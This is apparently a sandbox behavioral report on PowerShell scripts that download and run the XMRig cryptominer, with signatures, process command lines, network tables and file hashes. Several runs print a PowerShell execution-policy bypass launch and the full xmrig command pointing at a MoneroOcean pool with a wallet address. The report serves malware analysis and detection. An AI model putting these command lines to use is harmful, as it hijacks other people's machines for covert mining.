memory/4012-58-0x000002434F960000-0x000002434F980000-memory.dmp
memory/4012-57-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-60-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-61-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-62-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-63-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-64-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
memory/4012-65-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:56
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 3440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5008 wrote to memory of 3440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
Files
memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-5-0x000001AF1A250000-0x000001AF1A272000-memory.dmp
memory/5008-8-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-9-0x000001AF1A400000-0x000001AF1A476000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djgysfnp.xsk.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5008-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-48-0x000001AF1A3E0000-0x000001AF1A3F2000-memory.dmp
memory/5008-61-0x000001AF1A3C0000-0x000001AF1A3CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:00
Platform
win11-20240508-en
Max time kernel
1653s
Max time network
1663s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/636-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2ifjlmu.tjm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/636-9-0x00000281BC4A0000-0x00000281BC4C2000-memory.dmp
memory/636-10-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-13-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/636-14-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:03
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4512 wrote to memory of 3176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4512 wrote to memory of 3176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/4512-4-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-6-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-5-0x00000264B24E0000-0x00000264B2502000-memory.dmp
memory/4512-7-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-10-0x00000264B2690000-0x00000264B2706000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggzvjwjv.j3g.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4512-26-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp
memory/4512-49-0x00000264B2810000-0x00000264B2822000-memory.dmp
memory/4512-62-0x00000264B2670000-0x00000264B267A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:15
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3264 wrote to memory of 4852 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3264 wrote to memory of 4852 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3828 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4088 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.204.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
Files
memory/3264-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
memory/3264-1-0x0000025EEF860000-0x0000025EEF882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5pgz2fyk.0yc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3264-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/3264-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/3264-13-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/3264-15-0x0000025EEFA10000-0x0000025EEFA22000-memory.dmp
memory/3264-16-0x0000025EEF9F0000-0x0000025EEF9FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:58
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1799s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/1932-0-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy0xdoh1.oqr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:10
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1802s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4024 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=996,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/4540-0-0x00007FF94B5A3000-0x00007FF94B5A5000-memory.dmp
memory/4540-1-0x000001DDC9B70000-0x000001DDC9B92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_diw4zaux.zei.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win10v2004-20240508-en
Max time kernel
1582s
Max time network
1591s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2236-0-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp
memory/2236-10-0x0000021B9B560000-0x0000021B9B582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xndcpwrw.vnd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:14
Platform
win11-20240508-en
Max time kernel
1651s
Max time network
1660s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/1436-0-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
memory/1436-1-0x000002425C8E0000-0x000002425C902000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uuijxreg.sde.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:50
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
